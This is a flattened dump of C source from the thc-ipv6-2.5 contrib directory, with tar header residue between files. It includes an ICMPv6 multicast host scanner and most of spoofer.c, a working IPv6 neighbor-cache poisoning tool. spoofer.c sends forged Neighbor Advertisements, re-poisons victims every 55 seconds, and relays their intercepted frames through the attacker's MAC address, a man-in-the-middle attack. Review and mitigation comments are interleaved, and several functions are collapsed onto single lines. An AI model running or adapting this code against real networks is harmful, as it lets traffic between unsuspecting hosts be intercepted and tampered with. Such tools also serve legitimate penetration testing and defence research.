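void check_packets(u_char * foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  /* Ethernet header + IPv6 header up to and including the 16 byte source address */
  const unsigned int needed = ETH_HDR_LEN + 8 + 16;
  const int capacity = (int) (sizeof(alive) / sizeof(alive[0]));
  const unsigned char *ip6, *src_ip, *src_mac;
  unsigned char *ip_copy, *mac_copy;
  int i;

  (void) foo;

  // A truncated capture must not be parsed: the reads below would run past
  // the end of the captured data, and caplen - 14 would wrap around.
  if (header == NULL || data == NULL || header->caplen < needed)
    return;

  ip6 = data + ETH_HDR_LEN;     // start of the IPv6 header
  src_ip = ip6 + 8;             // IPv6 source address
  src_mac = data + 6;           // Ethernet source MAC (same bytes as ip6 - 8)

  // Debug helper: dump the captured packet to the screen
  if (debug) {
    thc_dump_data((unsigned char *) ip6, header->caplen - ETH_HDR_LEN, "Received Packet");
  }

  // Skip hosts (IP + MAC pair) that were already recorded as alive
  for (i = 0; i < alive_no; i++) {
    if (memcmp(alive[i], src_ip, 16) == 0 && memcmp(aliveMac[i], src_mac, 6) == 0)
      return;
  }

  // The tables have a fixed size; replies beyond that are dropped instead of
  // being written past the end of the arrays.
  if (alive_no >= capacity)
    return;

  // Allocate both entries before touching the tables, so that a failed
  // second allocation neither leaks the first nor leaves a half-filled slot.
  ip_copy = malloc(16);
  mac_copy = malloc(6);
  if (ip_copy == NULL || mac_copy == NULL) {
    free(ip_copy);
    free(mac_copy);
    return;
  }

  printf(".");
  memcpy(ip_copy, src_ip, 16);
  memcpy(mac_copy, src_mac, 6);
  alive[alive_no] = ip_copy;
  aliveMac[alive_no] = mac_copy;
  alive_no++;
}

/**
 * Helper that prints a MAC address to standard output.
 *
 *   ptr --> MAC address to print; six bytes are read
 */
void printMAC(unsigned char *ptr) {
  printf("%02X-%02X-%02X-%02X-%02X-%02X", ptr[0], ptr[1], ptr[2], ptr[3], ptr[4], ptr[5]);
}

/**
 * Helper that prints an IPv6 address to standard output.
 *
 *   ptr --> IPv6 address to print
 */
void printIP6(unsigned char *ptr) {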
printf("%02x%02x:%02x%02x:%02x%02x:%02x%02x:%02x%02x:%02x%02x:%02x%02x:%02x%02x", *(ptr), *(ptr + 1), *(ptr + 2), *(ptr + 3), *(ptr + 4), *(ptr + 5), *(ptr + 6), *(ptr + 7), *(ptr + 8), *(ptr + 9), *(ptr + 10), *(ptr + 11), *(ptr + 12), *(ptr + 13), *(ptr + 14), *(ptr + 15));
}

/**
 * Prints the scan results as a table.
 *
 * Walks the alive[] and aliveMac[] tables, which hold the addresses of the
 * hosts found during the scan, using alive_no as the number of valid rows.
 */
void printAliveSystems() {
  static const char border[] = "+-----------------------------------------+-------------------+\n";
  int row = 0;

  printf("Foram Encontrados %d Sistemas IPv6\n", alive_no);
  fputs(border, stdout);
  fputs("| IP6 | MAC |\n", stdout);
  fputs(border, stdout);

  // one table row per discovered host: IPv6 address, then MAC address
  while (row < alive_no) {
    fputs("| ", stdout);
    printIP6(alive[row]);
    fputs(" | ", stdout);
    printMAC(aliveMac[row]);
    fputs(" |\n", stdout);
    row++;
  }

  fputs(border, stdout);
}

/** Function that sends an Echo Request packet on the given interface to the multicast address passed as parameter.
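*/
/*
 * Builds one ICMPv6 Echo Request carrying BUF_SIZE bytes from buf, wraps it
 * in a link-layer frame and sends it; when router6 is set, a routing header
 * is added and the packet is sent as fragments instead.
 *
 * Returns 0 when the packet was handed to the send routine, -1 when a
 * parameter is unusable, the packet could not be built, or the plain send
 * failed. Exits the process if the frame cannot be generated.
 */
int sendEchoRequest(char *interface,           // interface the packet is sent on
                    unsigned char *multicast6, // IPv6 multicast address [destination]
                    unsigned char *src6,       // address of the sending host [IPv6]
                    unsigned char *router6,    // router [NULL if not needed]
                    unsigned char **routers,   // routing list
                    unsigned char *buf,        // buffer with the data to send, at least BUF_SIZE bytes
                    unsigned char *mac,        // destination address [MAC]
                    unsigned char *macsrc) {   // address of the sending host [MAC]
  int pkt1_len = 0;             // length of the packet to send
  unsigned char *pkt1 = NULL;   // packet being assembled and sent
  thc_ipv6_hdr *hdr;            // IPv6 header structure
  int rc = -1;

  // buf is already a pointer to the payload. Without a payload there is
  // nothing valid to copy, so refuse instead of reading unrelated memory.
  if (buf == NULL)
    return -1;

  // create the first packet for the multicast address
  if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, src6, multicast6, 0, 0, 0, 0, 0)) == NULL)
    return -1;

  // if a route was set, a routing header is added
  if (router6 != NULL && thc_add_hdr_route(pkt1, &pkt1_len, routers, 1) < 0)
    goto done;

  // the echo request is created; the payload is buf itself, not &buf: the
  // address of the parameter would put the pointer value and the stack bytes
  // next to it on the wire
  if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_PINGREQUEST, 0, PKT_FLAGS, buf, BUF_SIZE, 0) < 0)
    goto done;

  // here the packet is encapsulated
  if (thc_generate_pkt(interface, macsrc, mac, pkt1, &pkt1_len) < 0) {
    fprintf(stderr, "Error: Can not send packet, exiting ...\n");
    exit(-1);
  }

  if (router6 != NULL) {
    // routed: send as fragments
    hdr = (thc_ipv6_hdr *) pkt1;
    thc_send_as_fragment6(interface, src6, multicast6, NXT_ROUTE, hdr->pkt + IP6_HDR_LEN + ETH_HDR_LEN, hdr->pkt_len - IP6_HDR_LEN - ETH_HDR_LEN,
                          hdr->pkt_len > 1448 ? 1448 : (((hdr->pkt_len - IP6_HDR_LEN - ETH_HDR_LEN) / 16) + 1) * 8);
    rc = 0;
  } else {
    // otherwise send the packet normally
    rc = thc_send_pkt(interface, pkt1, &pkt1_len) < 0 ? -1 : 0;
  }

done:
  // release the packet on every path that returns
  thc_destroy_packet(pkt1);
  return rc;
}

/** Function that sends an Echo Request packet carrying a fault in the options field on the given interface to the multicast address passed as parameter.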
*/ int sendEchoRequestOptions(char *interface, // Interface inde se sendrá o pacote unsigned char *multicast6, // Enedereço de Multicast IPv6 [destino] unsigned char *src6, // Enedereço do host que send o pacote [IPv6] unsigned char *router6, // Roteador [NULL caso não necessite] unsigned char **routers, // Lista de Roteamento unsigned char *buf, // Buffer contendo os dados a serem senddos unsigned char *mac) { // Endereço do host q send o pacote [MAC] int pkt2_len = 0; // Tamanho do pacote a ser senddo unsigned char *pkt2 = NULL; // Pacote a ser montado e senddo thc_ipv6_hdr *hdr; // Estrutura do header IPv6 // cria o segundo pacote para o endereco de multicast if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt2_len, src6, multicast6, 0, 0, 0, 0, 0)) == NULL) return -1; // caso tenha sido setado uma rota e adicionado um header de rota if (router6 != NULL) if (thc_add_hdr_route(pkt2, &pkt2_len, routers, 1) < 0) return -1; // adiciona um header invalido ??? if (thc_add_hdr_misc(pkt2, &pkt2_len, NXT_INVALID, -1, (unsigned char *) &buf, BUF_SIZE) < 0) return -1; // adiciona um echo request if (thc_add_icmp6(pkt2, &pkt2_len, ICMP6_PINGREQUEST, 0, PKT_FLAGS, (unsigned char *) &buf, BUF_SIZE, 0) < 0) return -1; // encapsula o pacote thc_generate_pkt(interface, NULL, mac, pkt2, &pkt2_len); // se for para uma rota send como fragmento ?? if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt2; thc_send_as_fragment6(interface, src6, multicast6, NXT_ROUTE, hdr->pkt + IP6_HDR_LEN + ETH_HDR_LEN, hdr->pkt_len - IP6_HDR_LEN - ETH_HDR_LEN, hdr->pkt_len > 1448 ? 
1448 : (((hdr->pkt_len - IP6_HDR_LEN - ETH_HDR_LEN) / 16) + 1) * 8); } else // senao send o pacote normalmente thc_send_pkt(interface, pkt2, &pkt2_len); } int sendEchoRequestHopByHop(char *interface, // Interface inde se sendrá o pacote unsigned char *multicast6, // Enedereço de Multicast IPv6 [destino] unsigned char *src6, // Enedereço do host que send o pacote [IPv6] unsigned char *router6, // Roteador [NULL caso não necessite] unsigned char **routers, // Lista de Roteamento unsigned char *buf, // Buffer contendo os dados a serem senddos unsigned char *mac) { // Endereço do host q send o pacote [MAC] int pkt3_len = 0; // Tamanho do pacote a ser senddo unsigned char *pkt3 = NULL; // Pacote a ser montado e senddo thc_ipv6_hdr *hdr; // Estrutura do header IPv6; // cria o 3o pacote para o endereco de multicast if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt3_len, src6, multicast6, 0, 0, 0, 0, 0)) == NULL) return -1; // caso tenha sido setado uma rota e adicionado um header de rota if (router6 != NULL) if (thc_add_hdr_route(pkt3, &pkt3_len, routers, 1) < 0) return -1; // adiciona um cabecalho hop by hop ??? if (thc_add_hdr_hopbyhop(pkt3, &pkt3_len, (unsigned char *) &buf, BUF_SIZE) < 0) return -1; // adiciona um cabecalho echo request if (thc_add_icmp6(pkt3, &pkt3_len, ICMP6_PINGREQUEST, 0, PKT_FLAGS, (unsigned char *) &buf, BUF_SIZE, 0) < 0) return -1; // encapsula o pacote thc_generate_pkt(interface, NULL, mac, pkt3, &pkt3_len); // se for para uma rota send como fragmento ?? if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt3; thc_send_as_fragment6(interface, src6, multicast6, NXT_ROUTE, hdr->pkt + IP6_HDR_LEN + ETH_HDR_LEN, hdr->pkt_len - IP6_HDR_LEN - ETH_HDR_LEN, hdr->pkt_len > 1448 ? 
1448 : (((hdr->pkt_len - IP6_HDR_LEN - ETH_HDR_LEN) / 16) + 1) * 8); } else // senao send o pacote normalmente thc_send_pkt(interface, pkt3, &pkt3_len); } /** Função principal que realiza o host scan IPv6 na rede */ int hostScan(int rawmode, // informa se o "raw mode" foi ativado ou nao char *interface, // nome da interface de analise unsigned char *multicast6, // endereco do grupo multicast de destino unsigned char *router6, // roteador da rota parametrizada unsigned char **routers) { unsigned char *src6 = NULL, // endereco ip6 do host [que realiza o scan] *mac = NULL, // endereco MAC do host [que realiza o scan] string[64] = "ip6 and dst "; // Mascara de captura de pacotes [apenas 1pv6 e destino a ser marcado] time_t passed; // timestamp do inicio do scan pcap_t *p; // contexto pcap de captura // obtendo seu proprio endereco ip6 src6 = thc_get_own_ipv6(interface, multicast6, PREFER_GLOBAL); // se estiver operando em "raw mode" deve-se resolver seu proprio endereco MAC if (rawmode == 0 && (mac = thc_get_mac(interface, src6, multicast6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", thc_ipv62string(src6)); exit(-1); } // setar o endereco do host para a filtragem de pacotes recebidos strcat(string, thc_string2notation(thc_ipv62string(src6))); // make the sending buffer unique memset(buf, 'A', sizeof(buf)); // Preenche o buffer com o caractere 'A' time((time_t *) & buf[2]); // coloca da 3a posicao do buffer o tempo em segundos [padrao] buf[10] = getpid() % 256; // coloca o valor do process id .. buf[11] = getpid() / 256; // .. 
nas posicoes 11 e 12 do buffer memcpy(&buf[12], multicast6, 4); // coloca o endereco de multicast na 13a posicao do buffer // inicializa a interface de captura de pacotes com o filtro criado if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } // Envio do 1o pacote : Echo Request Comum sendEchoRequest(interface, multicast6, src6, router6, routers, buf, mac, NULL); // Envio do 2o pacote : Echo Request Com falha de Opções sendEchoRequestOptions(interface, multicast6, src6, router6, routers, buf, mac); // altera os dados do buffer ??? buf[0] = NXT_INVALID; buf[1] = 1; // Envio do 3o pacote : Echo Request Com dados Hop by Hop sendEchoRequestHopByHop(interface, multicast6, src6, router6, routers, buf, mac); // ??? while (thc_pcap_check(p, (char *) check_packets, NULL) > 0 && (alive_no == 0 || *multicast6 == 0xff)); // Anota o tempo de inicio passed = time(NULL); // enquanto nao se passam 5 segundos while (passed + 5 >= time(NULL) && (alive_no == 0 || *multicast6 == 0xff)) thc_pcap_check(p, (char *) check_packets, NULL); // verifica os pacotes capturados // fecha a interface de captura thc_pcap_close(p); // informa o numero de hosts ativos encontrados //printf("Found %d systems alive\n", alive_no); printf("\n"); printAliveSystems(); } int main(int argc, char *argv[]) { unsigned char *router6 = NULL; // roteador da rota parametrizada unsigned char *multicast6, // endereco do grupo multicast de destino *routers[2]; int rawmode = 0; // informa se o "raw mode" foi ativado ou nao char *interface; // nome da interface de analise // verifica se foi pedida as instrucoes de uso if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); // verifica se foi selecionado para funcionar em "raw mode" if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } // nome da interface de captura interface = argv[1]; // pode ser informado um grupo 
multicast para se limitar o escopo do scan if (argv[2] != NULL && argc > 2) multicast6 = thc_resolve6(argv[2]); else // caso nao tenha sido informado eh utilizado o endereco de multicast[broadcast] padrao multicast6 = thc_resolve6("ff02::1"); // caso seja passado alguma rota , setar os roteadores if (argv[3] != NULL && argc > 3) { router6 = thc_resolve6(argv[3]); routers[0] = multicast6; routers[1] = NULL; multicast6 = router6; // switch destination and router } hostScan(rawmode, interface, multicast6, router6, routers); return 0; } thc-ipv6-2.5/contrib/Makefile0000644000000000000000000000065412256335477014641 0ustar rootrootPROGRAMS= host_scan spoofer CC=gcc #CFLAGS?=-Wall -ggdb CFLAGS?=-O2 LDFLAGS+=-lpcap -lssl -lcrypto -I.. PREFIX=/usr/local LIBS=../thc-ipv6-lib.o all: $(PROGRAMS) %: %.c $(CC) $(CFLAGS) -o $@ $^ $(LDFLAGS) $(LIBS) clean: rm -f $(PROGRAMS) *~ core DEADJOE strip: all strip $(PROGRAMS) install: strip install -m0755 -d ${DESTDIR}${PREFIX}/bin install -m0755 $(PROGRAMS) ${DESTDIR}${PREFIX}/bin .PHONY: all install clean thc-ipv6-2.5/contrib/data_structures.h0000644000000000000000000000104412256335477016560 0ustar rootroot#ifndef DATA_STRUCTURES_H_ #define DATA_STRUCTURES_H_ typedef struct { char *interface; unsigned char *uniOrMultiCastAddr; //char *router; int rawMode; } HArgs; typedef struct { char *interface; unsigned char *ipAddr; int rawMode; unsigned char *ownIp; unsigned char *ownMac; } RArgs; typedef struct { char *interface; unsigned char *ipAddrVic1, *ipAddrVic2; unsigned char *macAddrVic1, *macAddrVic2; int twoVics; int rawMode; unsigned char *ownIp; unsigned char *ownMac; } MArgs; #endif /*DATA_STRUCTURES_H_ */ thc-ipv6-2.5/contrib/host_scan.h0000644000000000000000000000212712256335477015330 0ustar rootroot#ifndef HOST_SCAN_H_ #define HOST_SCAN_H_ #if defined (HOST_SCAN_C) #define HOST_SCAN_EXT #else #define HOST_SCAN_EXT extern #endif /** Função que realiza o envio de um pacote Echo Request para na interface especificada para o endereço 
de multicast passado como parâmetro. */ HOST_SCAN_EXT int sendEchoRequest(char *interface, // Interface inde se sendrá o pacote unsigned char *multicast6, // Enedereço de Multicast IPv6 [destino] unsigned char *src6, // Enedereço do host que send o pacote [IPv6] unsigned char *router6, // Roteador [NULL caso não necessite] unsigned char **routers, // Lista de Roteamento unsigned char *buf, // Buffer contendo os dados a serem senddos unsigned char *mac, // Endereço do host de destino [MAC] unsigned char *macsrc); // Endereço do host q send o pacote [MAC] #undef HOST_SCAN_EXT #endif thc-ipv6-2.5/contrib/spoofer.c0000644000000000000000000002631512256335477015024 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include "host_scan.h" #define SPOOFER_C_ #include "spoofer.h" #undef SPOOFER_C_ #define DEBUG 0 #define TIMER_TO_SPOOF 55 //in seconds, the normal cache is set to 60 seconds #define ETH_HDR_LEN 14 // Extensão do cabeçalho Ethernet #define IP6_HDR_LEN 40 // Extensão do cabeçalho IPv6 #define BUF_SIZE 16 // Extensão do Buffer de Envio #define PKT_FLAGS 0xdeadbeef // Flags de envio do pacote [ID|SEQ] extern int thc_socket; extern char *default_interface; int pidRepeater1 = 0; //process id to send the kill signal int pidInfector1 = 0; //process id to send the kill signal int pidInfector2 = 0; //process id to send the kill signal MArgs mArgs; unsigned char *pkt = NULL, buf[24], mac[7] = ""; unsigned char fakemac[7] = "\x00\x0c\x29\x01\x75\xfe" /*"\x00\xfa\b5\x00\x44\xd5", */ ; unsigned char targetmac[7] = /*"\x00\x0c\x29\xf2\x44\xd5"; */ "\x00\x0c\x29\x0e\x09\x7a"; unsigned char *mac6 = mac, *src6, *target6, *oldrouter6, *newrouter6; int pkt_len = 0; thc_ipv6_hdr *ipv6; char *interface; int rawmode = 0; int mychecksum; unsigned char *nodeAIp, *nodeAMac, *nodeBIp, *nodeBMac, *ownMac; int createRepeater(unsigned char *nodAIp, unsigned char *nodAMac, unsigned char *nodBIp, unsigned char *nodBMac); 
/**
 * Parse a textual MAC address ("xx:xx:xx:xx:xx:xx", hex octets) into a newly
 * allocated 6-byte buffer.
 *
 * @param maco  NUL-terminated string to parse (handed to sscanf as-is)
 * @return      malloc()ed buffer; the caller owns it. No caller in this file
 *              frees the result, so every call leaks 6 bytes.
 *
 * NOTE(review): each "%x" stores a whole unsigned int through a pointer into
 * the 6-byte allocation, so the stores for the later octets run past the end
 * of the buffer wherever sizeof(unsigned int) > 1 ("%hhx" into unsigned char
 * would fit). The results of malloc() and sscanf() are not checked.
 */
unsigned char *resolveMAC(unsigned char *maco) {
  unsigned char *mac = malloc(6);

  sscanf(maco, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
         (unsigned int *) &mac[5]);

  return mac;
}

/**
 * Own packet sending function: writes a raw frame to thc_socket with sendto(),
 * opening the socket through thc_open_ipv6() on first use.
 *
 * @param interface  interface name; NULL selects default_interface
 * @param pkt        bytes to transmit
 * @param pkt_len    pointer to the number of bytes to transmit
 * @return           -1 if the sanity check fails, otherwise sendto()'s result
 *
 * NOTE(review): strcpy() into sa.sa_data has no length check; sa_data is a
 * small fixed array (14 bytes in the usual struct sockaddr), so a longer
 * interface name overruns the stack object. sa.sa_family is never set.
 * NOTE(review): pkt is viewed as a thc_ipv6_hdr for the sanity check, but the
 * only caller in this file (repeater) passes a copy of a captured frame --
 * presumably the hdr->pkt / hdr->pkt_len reads then interpret frame bytes as
 * struct fields; confirm against the thc_ipv6_hdr definition.
 */
int daemon6_send_pkt(char *interface, unsigned char *pkt, int *pkt_len) {
  struct sockaddr sa;
  thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt;

  if (pkt == NULL || hdr->pkt == NULL || hdr->pkt_len < 1)
    return -1;

  if (interface == NULL)
    interface = default_interface;
  strcpy(sa.sa_data, interface);

  if (thc_socket < 0)
    thc_socket = thc_open_ipv6();
  return sendto(thc_socket, pkt, *pkt_len, /*hdr->pkt, hdr->pkt_len, */ 0, &sa, sizeof(sa));
}

/**
 * Builds and sends an ICMPv6 Echo Request on the given interface to the
 * destination address passed in multicast6. When router6 is non-NULL a routing
 * header is added and the packet goes out through thc_send_as_fragment6().
 *
 * Returns -1 when building the packet fails; exits the process when
 * thc_generate_pkt() fails.
 *
 * NOTE(review): the success path falls off the end of a non-void function, so
 * the value a caller would read is indeterminate (no caller in this file uses
 * it).
 * NOTE(review): `(unsigned char *) &buf` is the address of the pointer
 * parameter itself, not of the caller's buffer; BUF_SIZE (16) bytes starting
 * at that stack slot become the echo payload, i.e. the pointer value plus
 * whatever follows it in memory. Every caller in this file passes buf == NULL.
 * NOTE(review): pkt1 is not released on any path here.
 */
int sendEchoRequest(char *interface,    // Interface the packet is sent on
                    unsigned char *multicast6,  // IPv6 multicast address [destination]
                    unsigned char *src6,        // Address of the sending host [IPv6]
                    unsigned char *router6,     // Router [NULL if not needed]
                    unsigned char **routers,    // Routing list
                    unsigned char *buf, // Buffer holding the data to be sent
                    unsigned char *mac, // Destination address [MAC]
                    unsigned char *macsrc) {    // Address of the sending host [MAC]
  int pkt1_len = 0;             // Size of the packet to be sent
  unsigned char *pkt1 = NULL;   // Packet to be assembled and sent
  thc_ipv6_hdr *hdr;            // IPv6 header structure

  // create the first packet for the multicast address
  if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, src6, multicast6, 0, 0, 0, 0, 0)) == NULL)
    return -1;

  // if a route was given, a routing header is added
  if (router6 != NULL)
    if (thc_add_hdr_route(pkt1, &pkt1_len, routers, 1) < 0)
      return -1;

  // the echo request packet is created
  if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_PINGREQUEST, 0, PKT_FLAGS, (unsigned char *) &buf, BUF_SIZE, 0) < 0)
    return -1;

  // here the packet is encapsulated
  if (thc_generate_pkt(interface, macsrc, mac, pkt1, &pkt1_len) < 0) {
    fprintf(stderr, "Error: Can not send packet, exiting ...\n");
    exit(-1);
  }
  // if it goes via a route, send it as a fragment ??
  if (router6 != NULL) {
    hdr = (thc_ipv6_hdr *) pkt1;
    thc_send_as_fragment6(interface, src6, multicast6, NXT_ROUTE, hdr->pkt + IP6_HDR_LEN + ETH_HDR_LEN, hdr->pkt_len - IP6_HDR_LEN - ETH_HDR_LEN,
                          hdr->pkt_len > 1448 ? 1448 : (((hdr->pkt_len - IP6_HDR_LEN - ETH_HDR_LEN) / 16) + 1) * 8);
  } else                        // otherwise send the packet normally
    thc_send_pkt(interface, pkt1, &pkt1_len);
}

/**
 * Sends five Neighbor Advertisements through thc_neighboradv6(), all with the
 * same arguments (nodeBIp, nodeAIp, the parsed mArgs.ownMac, nodeAMac), with
 * usleep() gaps of 100, 200, 300 and 400 microseconds between them.
 *
 * The argument order of thc_neighboradv6() is not visible in this file;
 * presumably 0x60000000 is the NA flags word (Solicited|Override in RFC 4861
 * terms) -- confirm against thc-ipv6.h.
 *
 * Detection/mitigation: alarmed() repeats this burst every TIMER_TO_SPOOF (55)
 * seconds, so a monitor sees a periodic group of five identical NAs in about
 * one millisecond, and the link-layer address bound to an IPv6 address
 * changes. Neighbor-cache change monitoring, switch-level ND inspection and
 * SEND (RFC 3971) address this class of traffic.
 *
 * NOTE(review): resolveMAC() allocates on each of the five calls and nothing
 * frees the results.
 */
void sendPoison() {
  thc_neighboradv6(mArgs.interface, nodeBIp, nodeAIp, resolveMAC(mArgs.ownMac), nodeAMac, 0x60000000, nodeBIp);
  usleep(100);
  thc_neighboradv6(mArgs.interface, nodeBIp, nodeAIp, resolveMAC(mArgs.ownMac), nodeAMac, 0x60000000, nodeBIp);
  usleep(200);
  thc_neighboradv6(mArgs.interface, nodeBIp, nodeAIp, resolveMAC(mArgs.ownMac), nodeAMac, 0x60000000, nodeBIp);
  usleep(300);
  thc_neighboradv6(mArgs.interface, nodeBIp, nodeAIp, resolveMAC(mArgs.ownMac), nodeAMac, 0x60000000, nodeBIp);
  usleep(400);
  thc_neighboradv6(mArgs.interface, nodeBIp, nodeAIp, resolveMAC(mArgs.ownMac), nodeAMac, 0x60000000, nodeBIp);
}

/**
 * Restores the neighbor entry: sends one Echo Request (ipA as destination,
 * ipB as source, macA/macB as the frame addresses) followed by five Neighbor
 * Advertisements that carry ipB together with macB, using the same timing as
 * sendPoison().
 *
 * The echo request is called with buf == NULL; see the note on
 * sendEchoRequest() about what is actually used as payload.
 */
void sendVaccine(unsigned char *ipA, unsigned char *ipB, unsigned char *macA, unsigned char *macB) {
  sendEchoRequest(mArgs.interface, ipA, ipB, NULL, NULL, NULL, macA, macB);
  thc_neighboradv6(mArgs.interface, ipB, ipA, macB, macA, 0x60000000, ipB);
  usleep(100);
  thc_neighboradv6(mArgs.interface, ipB, ipA, macB, macA, 0x60000000, ipB);
  usleep(200);
  thc_neighboradv6(mArgs.interface, ipB, ipA, macB, macA, 0x60000000, ipB);
  usleep(300);
  thc_neighboradv6(mArgs.interface, ipB, ipA, macB, macA, 0x60000000, ipB);
  usleep(400);
  thc_neighboradv6(mArgs.interface, ipB, ipA, macB, macA, 0x60000000, ipB);
}

/**
 * SIGALRM handler: runs sendPoison() and re-arms the alarm for
 * TIMER_TO_SPOOF seconds.
 *
 * NOTE(review): sendPoison() reaches malloc() and sscanf() via resolveMAC(),
 * which are not async-signal-safe; the interrupted code in the child is only
 * a sleep() loop, but the handler is also called directly from
 * maintainInfection().
 */
void alarmed() {
  sendPoison();
  alarm(TIMER_TO_SPOOF);
}

/**
 * Forks a child that stores the resolved node addresses in the file-level
 * globals, installs alarmed() for SIGALRM, sends one Echo Request, fires the
 * first alarmed() call and then sleeps forever.
 *
 * @return the child's pid in the parent. A failed fork() (-1) is returned
 *         unchanged and is not checked by the caller.
 *
 * NOTE(review): spoofer() passes values that main() already obtained from
 * thc_resolve6()/thc_get_mac(); here they go through thc_resolve6() and
 * resolveMAC() again. Whether those values are text or binary at this point
 * depends on the thc-ipv6 library -- confirm.
 */
int maintainInfection(unsigned char *nodAIp, unsigned char *nodAMac, unsigned char *nodBIp, unsigned char *nodBMac) {
  int pid = 0;

  if ((pid = fork()) == 0) {
    nodeAIp = thc_resolve6(nodAIp);
    nodeAMac = resolveMAC(nodAMac);
    nodeBIp = thc_resolve6(nodBIp);
    nodeBMac = resolveMAC(nodBMac);
    if (DEBUG)
      puts("Infectuous process!");
    signal(SIGALRM, alarmed);
    //sends an echo request in order to induce a neigh solicitation
    sendEchoRequest(mArgs.interface, nodeAIp, nodeBIp, NULL, NULL, NULL, nodeAMac, resolveMAC(mArgs.ownMac));
    alarmed();
    while (1)
      sleep(1);                 //to keep the process alive
    exit(0);                    // never reached
  }
  return pid;
}

/**
 * SIGTERM handler: kills the three child processes with SIGKILL, waits 20
 * seconds, sends the restoring advertisements in both directions and exits.
 *
 * NOTE(review): the pid globals start at 0 and hold -1 after a failed fork();
 * kill(0, ...) signals the caller's whole process group and kill(-1, ...)
 * signals every process the caller is allowed to signal. No guard prevents
 * either case here.
 * NOTE(review): printf(), sleep() and the allocation done by resolveMAC() are
 * not async-signal-safe.
 */
void end() {
  printf("Healing - %d %d %d\n", pidInfector1, pidInfector2, pidRepeater1);
  kill(pidInfector1, SIGKILL);
  kill(pidInfector2, SIGKILL);
  kill(pidRepeater1, SIGKILL);
  sleep(20);
  printf("Healing\n");
  sendVaccine(thc_resolve6(mArgs.ipAddrVic1), thc_resolve6(mArgs.ipAddrVic2), resolveMAC(mArgs.macAddrVic1), resolveMAC(mArgs.macAddrVic2));
  sendVaccine(thc_resolve6(mArgs.ipAddrVic2), thc_resolve6(mArgs.ipAddrVic1), resolveMAC(mArgs.macAddrVic2), resolveMAC(mArgs.macAddrVic1));
  exit(0);
}

/**
 * Entry point of the spoofing logic: copies the arguments into the global
 * mArgs, fills the node globals and, when twoVics is set, starts the two
 * maintainInfection() children and the repeater child, installs end() for
 * SIGTERM and then spins forever.
 *
 * NOTE(review): `while (1);` is a busy loop, so with twoVics set this function
 * never returns and burns a CPU core while waiting for the signal.
 * NOTE(review): only SIGTERM is routed to end(); no SIGINT handler is
 * installed anywhere in this file, so end() does not run on Control-C.
 */
void spoofer(MArgs mArgss) {
  mArgs = mArgss;
  nodeAIp = thc_resolve6(mArgs.ipAddrVic1);
  nodeAMac = resolveMAC(mArgs.macAddrVic1);
  nodeBIp = thc_resolve6(mArgs.ipAddrVic2);
  nodeBMac = resolveMAC(mArgs.macAddrVic2);

  //Decides if it is a 1 side spoof or a 2 side spoof
  if (mArgs.twoVics) {
    pidInfector1 = maintainInfection(mArgs.ipAddrVic1, mArgs.macAddrVic1, mArgs.ipAddrVic2, mArgs.macAddrVic2); //maintain the spoofer to A side
    pidInfector2 = maintainInfection(mArgs.ipAddrVic2, mArgs.macAddrVic2, mArgs.ipAddrVic1, mArgs.macAddrVic1); //maintain the spoofer to B side
    sleep(1);
    pidRepeater1 = createRepeater(mArgs.ipAddrVic1, mArgs.macAddrVic1, mArgs.ipAddrVic2, mArgs.macAddrVic2);
    signal(SIGTERM, end);       //sets the function to be called when the program ends
    while (1);
  } else {
    puts("1");
  }
  puts("---");
}

/**
 * Capture callback (registered through thc_pcap_function() in
 * createRepeater()): re-sends a captured frame with rewritten Ethernet
 * addresses.
 *
 * Frames carrying ICMPv6 Neighbor Solicitation/Advertisement are skipped, as
 * are frames whose destination MAC is not ownMac. The destination MAC of the
 * copy is set to the other node's MAC depending on the captured source MAC,
 * and the source MAC is set to ownMac.
 *
 * NOTE(review): ipv6hdr[6] and ipv6hdr[40] (frame offsets 20 and 54) and the
 * 12 MAC bytes are read without comparing header->caplen against those
 * offsets, so a short capture is read out of bounds.
 * NOTE(review): the malloc() result is not checked and pkt is never freed, so
 * every forwarded frame leaks caplen bytes.
 * NOTE(review): the literal 14 duplicates ETH_HDR_LEN.
 */
void repeater(u_char * foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  unsigned char *ipv6hdr = (unsigned char *) (data + 14);
  int pkt_len = header->caplen;
  unsigned char *pkt = NULL;
  int erro = 0;

  // leave neighbor discovery messages alone
  if (ipv6hdr[6] == NXT_ICMP6 && (ipv6hdr[40] == ICMP6_NEIGHBORSOL || ipv6hdr[40] == ICMP6_NEIGHBORADV)) {
    return;
  }
  // memcmp() != 0: the frame is not addressed to our MAC
  if (memcmp(data, ownMac, 6)) {
    return;
  }
  pkt = malloc(header->caplen);
  memcpy(pkt, data, header->caplen);
  if (DEBUG)
    thc_dump_data(pkt, pkt_len, "CAPTURED PACKET:");
  if (memcmp(data + 6, nodeAMac, 6) == 0) {
    memcpy(pkt, nodeBMac, 6);   //changing the destination
  }
  if (memcmp(data + 6, nodeBMac, 6) == 0) {
    memcpy(pkt, nodeAMac, 6);   //changing the destination
  }
  memcpy(pkt + 6, ownMac, 6);   //changing the source
  if (DEBUG)
    printf(" < %d >\n", pkt_len);
  if (DEBUG)
    thc_dump_data(pkt, pkt_len, "SPOOFED PACKET:");

  clearerr(stderr);
  if ((erro = daemon6_send_pkt(interface, pkt, &pkt_len)) < 0)
    perror("No success");
  if (DEBUG)
    printf("errono = %d\n", erro);
}

/**
